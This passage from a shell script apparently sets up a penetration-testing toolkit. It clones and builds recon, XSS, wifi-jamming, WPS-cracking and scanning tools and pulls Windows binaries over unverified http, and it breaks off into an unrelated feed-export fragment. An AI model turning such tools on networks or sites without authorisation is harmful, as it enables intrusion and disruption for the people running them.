#tools for recon
cd ~/$mydirectory/recon
git clone https://github.com/urbanadventurer/WhatWeb.git
cd ~/$mydirectory

#xss web-app
cd ~/$mydirectory/webapps
git clone https://github.com/spinkham/skipfish.git
cd ~/$mydirectory/webapps/skipfish
# The only sudo in the script; inconsistent with the rest, which assumes root.
sudo make
git clone https://github.com/mandatoryprogrammer/xssless.git
cd ~/$mydirectory

#wifi et wps
mkdir ~/$mydirectory/wireless
cd ~/$mydirectory/wireless
git clone https://github.com/DanMcInerney/wifijammer.git
git clone https://github.com/derv82/wifite.git
git clone https://github.com/bdpurcell/bully.git
cd ~/$mydirectory/wireless/bully/src
make
make install
cd ~/$mydirectory

echo "masscan"
cd ~/$mydirectory/network/masscan
make
cd ~/$mydirectory

echo "requirements for wpscan"
cd ~/$mydirectory/webapps/wpscan
bundle install
cd ~/$mydirectory

echo "install WSattacker"
mkdir ~/$mydirectory/webapps/ws_attacker
cd ~/$mydirectory/webapps/ws_attacker
wget -nc "http://downloads.sourceforge.net/project/ws-attacker/WS-Attacker%201.3/WS-Attacker-1.3.zip?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fws-attacker%2F&ts=1391476709&use_mirror=iweb" -O WS-Attacker-1.3.zip
unzip -o WS-Attacker-1.3.zip
rm -rf WS-Attacker-1.3.zip
cd ~/$mydirectory

echo "OWASP ZAP"
mkdir ~/$mydirectory/webapps/zap_proxy
cd ~/$mydirectory/webapps/zap_proxy
wget -nc "http://downloads.sourceforge.net/project/zaproxy/2.3.0/ZAP_2.3.0.1_Linux.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fzaproxy%2Ffiles%2F2.3.0%2F&ts=1397474662&use_mirror=iweb" -O ZAP_2.3.0.1_Linux.tar.gz
tar -xvf ZAP_2.3.0.1_Linux.tar.gz
rm -rf ZAP_2.3.0.1_Linux.tar.gz
cd ~/$mydirectory

echo "windows tools just in case no internets"
# Windows executables pulled over plain http with no hash check; they are
# stored, not run, here, but anything that later copies them to a Windows
# box inherits whatever was served.
mkdir ~/$mydirectory/windows
mkdir ~/$mydirectory/windows/win_tools
cd ~/$mydirectory/windows/win_tools
wget -nc http://www.oxid.it/downloads/ca_setup.exe
wget -nc http://www.ollydbg.de/odbg200.zip
wget -nc http://www.ollydbg.de/odbg110.zip
wget -nc http://out7.hex-rays.com/files/idafree50.exe


echo "correcting user-rights"
cd ~/
clear
# Hands the whole tree (including the root-built zmap/bully trees) to the
# user named at the prompt; $myname is not validated against /etc/passwd.
chown -R $myname:$myname ~/$mydirectory

echo "clean packages downloaded"
aptitude autoclean -y

--------------------------------------------------------------------------------
/export.opml:
--------------------------------------------------------------------------------
<opml version="1.1">
<head>
<title>FeedDemon Subscriptions
Thu, 17 Apr 2014 01:25:37 GMT